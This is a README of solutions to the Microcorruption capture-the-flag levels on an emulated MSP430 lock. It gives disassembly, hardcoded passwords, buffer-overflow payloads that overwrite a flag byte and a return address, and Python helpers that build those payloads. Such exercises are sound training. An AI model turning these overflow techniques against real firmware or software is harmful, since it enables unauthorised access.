Repository by Felix Martin; latest commit 69755b72aa "Document exercises Tutorial till Hanoi" (2023-01-21 13:20:59 -05:00). Files: LICENSE, README.md.

microcorruption

My solutions to the fantastic Microcorruption exercises.

Tutorial

The check_password routine counts the input bytes in r12 (including the terminating null) and compares the count with 9, so the password must be exactly 8 characters long:

4484:  6e4f           mov.b	@r15, r14
4486:  1f53           inc	r15
4488:  1c53           inc	r12
448a:  0e93           tst	r14
448c:  fb23           jnz	$-0x8 <check_password+0x0>
448e:  3c90 0900      cmp	#0x9, r12
4492:  0224           jz	$+0x6 <check_password+0x14>

Any eight-character input is valid, for example:

password

New Orleans

The password is hardcoded and stored at address 0x2400:

2400: 764f 7050 6e4b 5300 0000 0000 0000 0000   vOpPnKS.

Solution:

vOpPnKS

Sydney

The password is hardcoded in the check_password routine:

448a <check_password>
448a:  bf90 4f78 0000 cmp	#0x784f, 0x0(r15)
4490:  0d20           jnz	$+0x1c <check_password+0x22>
4492:  bf90 3b77 0200 cmp	#0x773b, 0x2(r15)
4498:  0920           jnz	$+0x14 <check_password+0x22>
449a:  bf90 2b74 0400 cmp	#0x742b, 0x4(r15)
44a0:  0520           jnz	$+0xc <check_password+0x22>
44a2:  1e43           mov	#0x1, r14
44a4:  bf90 5d2f 0600 cmp	#0x2f5d, 0x6(r15)
44aa:  0124           jz	$+0x4 <check_password+0x24>

Solution (hex; the 16-bit immediates are stored little endian, so the two bytes of each compared word are swapped):

4f783b772b745d2f

ASCII equivalent:

Ox;w+t]/
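Reading the password out of the Sydney listing by hand means swapping the bytes of every compared word and keeping them in offset order. The following script, an added example that is not part of the repository, automates that: it parses the `cmp #imm, off(r15)` lines from the disassembly text quoted above, orders the immediates by their r15 offset, and emits the bytes little endian. The listing embedded in the script is copied from the page; the regular expression and the contiguity check are assumptions about the Microcorruption disassembler's output format.

```python
import re

# Disassembly of the Sydney check_password routine, copied from the writeup.
SYDNEY_LISTING = """
448a:  bf90 4f78 0000 cmp     #0x784f, 0x0(r15)
4490:  0d20           jnz     $+0x1c <check_password+0x22>
4492:  bf90 3b77 0200 cmp     #0x773b, 0x2(r15)
4498:  0920           jnz     $+0x14 <check_password+0x22>
449a:  bf90 2b74 0400 cmp     #0x742b, 0x4(r15)
44a0:  0520           jnz     $+0xc <check_password+0x22>
44a2:  1e43           mov     #0x1, r14
44a4:  bf90 5d2f 0600 cmp     #0x2f5d, 0x6(r15)
44aa:  0124           jz      $+0x4 <check_password+0x24>
"""

# Matches "cmp #0xNNNN, 0xK(r15)" (assumed disassembler syntax); group 1 is the
# 16-bit immediate, group 2 the byte offset into the password buffer.
CMP_RE = re.compile(r"cmp\s+#0x([0-9a-fA-F]+),\s*0x([0-9a-fA-F]+)\(r15\)")


def extract_password(listing: str) -> bytes:
    """Collect every word compared against an offset of r15, order the words
    by offset, and serialise each one little endian (low byte first), which is
    how the MSP430 stores them in memory."""
    words = {}
    for line in listing.splitlines():
        m = CMP_RE.search(line)
        if m is None:
            continue
        imm = int(m.group(1), 16)
        off = int(m.group(2), 16)
        words[off] = imm.to_bytes(2, "little")
    if not words:
        raise ValueError("no cmp against r15 found in listing")
    # Every word covers two bytes, so the offsets must be 0, 2, 4, ... with
    # no gap; a gap would mean part of the password is checked elsewhere.
    expected = list(range(0, 2 * len(words), 2))
    if sorted(words) != expected:
        raise ValueError(f"non-contiguous offsets: {sorted(words)}")
    return b"".join(words[off] for off in expected)


def password_hex(listing: str = SYDNEY_LISTING) -> str:
    """Hex form of the password, ready to paste into the hex input box."""
    return extract_password(listing).hex()


def password_ascii(listing: str = SYDNEY_LISTING) -> str:
    """ASCII form of the password (every byte here is printable)."""
    return extract_password(listing).decode("ascii")


if __name__ == "__main__":
    print(password_hex())    # 4f783b772b745d2f
    print(password_ascii())  # Ox;w+t]/
```

The offset check matters when the routine compares words out of order or skips one; the script then refuses to guess rather than emitting a password with holes in it.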

Hanoi

The input password itself does not matter: the login routine only compares the byte at 0x2410 with the hardcoded value 0xb.

4552:  3f40 d344      mov	#0x44d3 "Testing if password is valid.", r15
4556:  b012 de45      call	#0x45de <puts>
455a:  f290 0b00 1024 cmp.b	#0xb, &0x2410
4560:  0720           jnz	$+0x10 <login+0x50>
4562:  3f40 f144      mov	#0x44f1 "Access granted.", r15
4566:  b012 de45      call	#0x45de <puts>
456a:  b012 4844      call	#0x4448 <unlock_door>

The input password is stored at 0x2400, so a long enough input overflows past the buffer and lets us set 0x2410 to 0xb. Solution in hex:

16 bytes from 0x2400 to 0x240f
                              \
bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb0b
                                --
             set 0x2410 to 0xb /

Cusco

At the end of the login function the stack pointer points to 0x43fe. The input password is allocated at 0x43ee. That means we can overwrite the return address at 0x43fe with the address of the unlock_door function at 0x4446.

Solution in hex:

16 bytes from 0x43ee to 0x43fe
                              \
bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb4644
                                ----
                               /
                               set 0x43fe to 0x4644 (unlock_door)
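Both Hanoi and Cusco come down to the same arithmetic: the distance from the input buffer to the byte or word we want to control, followed by the value itself in the CPU's byte order. The helper below is an added example, not code from the repository; it computes that padding and reproduces the two hex solutions given above for Hanoi (buffer 0x2400, target byte 0x2410) and Cusco (buffer 0x43ee, return address at 0x43fe, unlock_door at 0x4446). The filler byte 0xbb and the function names are my own choices.

```python
def overflow_offset(buf_addr: int, target_addr: int) -> int:
    """Number of filler bytes needed to reach target_addr from buf_addr."""
    if target_addr < buf_addr:
        raise ValueError("target lies before the start of the input buffer")
    return target_addr - buf_addr


def le16(value: int) -> bytes:
    """Encode a 16-bit value as the MSP430 stores it in memory (low byte first)."""
    if not 0 <= value <= 0xFFFF:
        raise ValueError("value does not fit in 16 bits")
    return value.to_bytes(2, "little")


def build_payload(buf_addr: int, target_addr: int, value: bytes,
                  filler: bytes = b"\xbb") -> str:
    """Hex string for the input box: filler from buf_addr up to target_addr,
    then `value` landing exactly at target_addr."""
    if len(filler) != 1:
        raise ValueError("filler must be a single byte")
    padding = overflow_offset(buf_addr, target_addr)
    return (filler * padding + value).hex()


def hanoi_payload() -> str:
    """Overflow the 0x2400 buffer so that the byte at 0x2410 becomes 0xb."""
    return build_payload(0x2400, 0x2410, bytes([0x0B]))


def cusco_payload() -> str:
    """Overflow the 0x43ee buffer so that the saved return address at 0x43fe
    becomes unlock_door (0x4446), written little endian as 46 44."""
    return build_payload(0x43EE, 0x43FE, le16(0x4446))


if __name__ == "__main__":
    print("Hanoi:", hanoi_payload())
    print("Cusco:", cusco_payload())
```

Because the lock takes raw hex input, a payload may contain 0x00 bytes; with a string-based input routine the same calculation would still hold, but any null in the filler or value would cut the input short, which is the first thing to check when a computed payload does not land.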

Reykjavik